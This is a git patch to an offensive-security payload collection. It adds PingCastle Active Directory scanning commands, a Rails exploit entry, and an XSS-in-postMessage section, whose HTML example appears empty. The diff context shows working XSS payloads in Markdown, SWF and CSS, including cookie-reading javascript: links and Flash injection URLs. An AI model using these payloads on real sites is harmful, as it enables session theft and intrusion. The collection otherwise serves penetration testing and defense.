From bd449e9cead1312d39e6f861ecf0e53596b541fd Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 3 Aug 2019 23:22:14 +0200 Subject: [PATCH] XSS PostMessage --- .../Active Directory Attack.md | 4 ++ README.md | 2 +- XSS Injection/README.md | 45 +++++++++++++++---- 3 files changed, 42 insertions(+), 9 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 56f32db6..6dae309e 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -91,6 +91,10 @@ ```powershell pingcastle.exe --healthcheck --server --user --password --advanced-live --nullsession + pingcastle.exe --healthcheck --server domain.local + pingcastle.exe --graph --server domain.local + pingcastle.exe --scanner scanner_name --server domain.local + available scanners are:aclcheck,antivirus,corruptADDatabase,foreignusers,laps_bitlocker,localadmin,ullsession,nullsession-trust,share,smb,spooler,startup ``` * [Kerbrute](https://github.com/ropnop/kerbrute) diff --git a/README.md b/README.md index 32796662..f6586c43 100644 --- a/README.md +++ b/README.md @@ -34,7 +34,6 @@ You might also like the `Methodology and Resources` folder : - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits) - Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py - - Apache Struts 2 CVE-2017-5638.py - Apache Struts 2 CVE-2017-9805.py - Apache Struts 2 CVE-2018-11776.py - Docker API RCE.py @@ -43,6 +42,7 @@ You might also like the `Methodology and Resources` folder : - JBoss CVE-2015-7501.py - Jenkins CVE-2015-8103.py - Jenkins CVE-2016-0792.py + - Rails CVE-2019-5420.rb - Shellshock CVE-2014-6271.py - Tomcat CVE-2017-12617.py - WebLogic CVE-2016-3510.py diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 51695bae..3a5a9f5b 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -13,6 +13,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) +- [XSS in PostMessage](#xss-in-postmessage) - [Blind XSS](#blind-xss) - [XSS Hunter](#xss-hunter) - [Other Blind XSS tools](#other-blind-xss-tools) @@ -262,7 +263,7 @@ vbscript:msgbox("XSS") ``` -XSS in XML +### XSS in XML ```xml @@ -273,7 +274,7 @@ XSS in XML ``` -XSS in SVG +### XSS in SVG ```xml @@ -287,7 +288,7 @@ XSS in SVG ``` -XSS in SVG (short) +### XSS in SVG (short) ```javascript @@ -297,7 +298,7 @@ XSS in SVG (short) </title><script>alert(3)</script> ``` -XSS in Markdown +### XSS in Markdown ```csharp [a](javascript:prompt(document.cookie)) @@ -306,7 +307,7 @@ XSS in Markdown [a](javascript:window.onerror=alert;throw%201) ``` -XSS in SWF flash application +### XSS in SWF flash application ```powershell Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); @@ -316,7 +317,7 @@ IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvali more payloads in ./files -XSS in SWF flash application +### XSS in SWF flash application ``` flashmediaelement.swf?jsinitfunctio%gn=alert`1` @@ -337,7 +338,7 @@ flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// ``` -XSS in CSS +### XSS in CSS ```html @@ -356,6 +357,33 @@ div { ``` +## XSS in PostMessage + +> If the target origin is asterisk * the message can be sent to any domain has reference to the child page. + +```html + + + + + + + +``` + ## Blind XSS ### XSS Hunter @@ -1002,6 +1030,7 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett - [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html) +- [postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/) - [postMessage XSS Bypass](https://hackerone.com/reports/231053) - [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin - [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans @@ -1014,4 +1043,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/) - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) -- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) +- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) \ No newline at end of file